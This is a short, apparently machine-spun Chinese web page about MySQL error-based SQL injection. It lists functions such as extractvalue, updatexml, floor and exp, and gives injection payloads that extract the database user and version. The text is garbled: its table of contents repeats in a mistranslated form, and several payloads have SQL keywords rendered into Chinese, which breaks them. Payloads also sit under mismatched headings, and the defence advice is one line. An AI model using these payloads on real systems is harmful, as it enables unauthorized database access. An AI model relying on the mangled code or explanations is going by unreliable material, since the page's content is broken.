报错注入(报错注入的函数有哪些)

报错注入目录
一、报错注入常见的函数
extarctvalue()函数
updatexml()函数
floor()函数
exp()
convert()
name_const()
二、报错注入的防御方法 一、报错注入常见的函数

目录

1. 报错和常用函数插入

提取值()函数

updatexml() 函数

楼层()函数

指数()

转变()

name_const()

2. 如何防止错误注入

一、报错注入常见的函数

extarctvalue()函数

id=1 and (extractvalue(1, concat(0x5c,(select user()))));

id=1 和(updatexml(0x3a,concat(1,(选择用户())),1));

updatexml()函数

id=1 和((选择计数(*),concat(版本(),地板) (rand (0)*2))x from information_schema.tables group by x)a)

floor()函数

id=1 and EXP(~(SELECT * from(select user())a)); 1010

exp()

避免使用导致错误注入的函数。过滤用户输入并添加防火墙。

#以上有关错误插入的相关内容来自网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91296.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月21日 下午6:51
下一篇 2024年6月21日 下午6:51

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注